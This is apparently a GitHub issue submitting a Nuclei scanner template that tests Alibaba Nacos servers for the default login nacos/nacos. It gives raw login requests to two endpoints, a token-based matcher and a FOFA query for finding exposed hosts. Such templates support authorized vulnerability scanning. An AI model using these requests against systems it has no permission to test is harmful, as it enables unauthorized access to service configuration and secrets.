### ISSUE TITLE
Alibaba Nacos Default password

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7962]
### Template Information:

Alibaba Nacos Default password
fofa: title=="Nacos"

### Nuclei Template:

```yaml
id: alibaba-nacos-default-password

info:
  name: Alibaba Nacos Default password
  author: SleepingBag945
  severity: medium
  description: |
    Login to the background to view sensitive information
  metadata:
    fofa-query: title=="Nacos"
  tags: Default password

http:
  - raw:
      - |
        POST /v1/auth/users/login  HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Nacos-Server
        Content-Type: application/x-www-form-urlencoded

        username=nacos&password=nacos

      - |
        POST /nacos/v1/auth/users/login  HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Nacos-Server
        Content-Type: application/x-www-form-urlencoded

        username=nacos&password=nacos


    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"accessToken")'
          - 'status_code_2 == 200 && contains(body_1,"accessToken")'
        condition: or

```
